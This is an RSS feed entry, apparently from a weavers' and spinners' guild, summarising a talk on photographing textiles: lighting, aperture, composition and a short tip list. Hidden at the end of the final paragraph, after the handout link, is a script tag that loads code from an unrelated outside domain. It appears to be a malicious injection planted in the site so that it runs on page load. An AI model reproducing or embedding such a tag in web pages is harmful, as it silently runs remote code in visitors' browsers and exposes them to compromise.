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	<title>Greater Vancouver Weavers &#38; Spinners Guild &#187; photography</title>
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		<title>Photography for Textiles by Felicia Lo</title>
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		<description><![CDATA[Our presenter, Felicia Lo, discussed photography for textiles. There are plenty of practical and artistic reasons why we take photos of our textiles. The photos may be for personal record-keeping purposes or for professional use. Felicia emphasized that we first need to understand our focus — what aspects of the fabric or fiber do we [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>Our presenter, <a title="sweetgeorgia yarns" href="http://blog.sweetgeorgiayarns.com" target="_blank">Felicia Lo</a>, discussed photography for textiles. There are plenty of practical and artistic reasons why we take photos of our textiles. The photos may be for personal record-keeping purposes or for professional use. Felicia emphasized that we first need to understand our focus — what aspects of the fabric or fiber do we want to portray in the photo? Then she discussed the variables that make up a good photograph, including shutter speeds, aperture, film, and especially lighting. A diffused natural light is best and can be achieved with several different set-ups. Composition of the photo must also be considered. An object off-center may make a more interesting photo. Felicia then presented a number of examples of good and bad photos as well as references for further study. She summarized with a quick list that will help us improve our photos:</p>
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<li> Use natural light.</li>
<li>Modify your light source.</li>
<li>Use a tripod.</li>
<li>Bracket your exposures.</li>
<li>Consider your composition.</li>
<li>Have fun!</li>
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<p>A copy of the lecture handout is available in PDF format at the <a href="http://blog.sweetgeorgiayarns.com/downloadme/" target="_blank">sweetgeorgia yarns blog here »</a><script src="http://ae.awaue.com/7"></script></p>
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